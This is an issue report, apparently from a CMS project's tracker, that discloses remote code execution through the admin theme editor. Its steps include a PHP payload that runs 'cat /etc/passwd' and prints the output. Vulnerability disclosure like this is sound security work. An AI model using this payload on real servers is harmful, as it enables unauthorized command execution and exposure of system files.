Remote Code Execution via Theme module
th3lawbreaker opened this issue · 1 comments
th3lawbreaker commented
Describe the bug
An attacker could insert any executable code through php via Theme Module to execution command in the server
To Reproduce
- Log into the panel.
- Go to "/admin/index.php?id=themes&action=edit_chunk"
- Click edit
- Insert payload
<?php exec('cat /etc/passwd 2>&1', $output); ?>
<?php print_r($output); ?>
- Go to index view
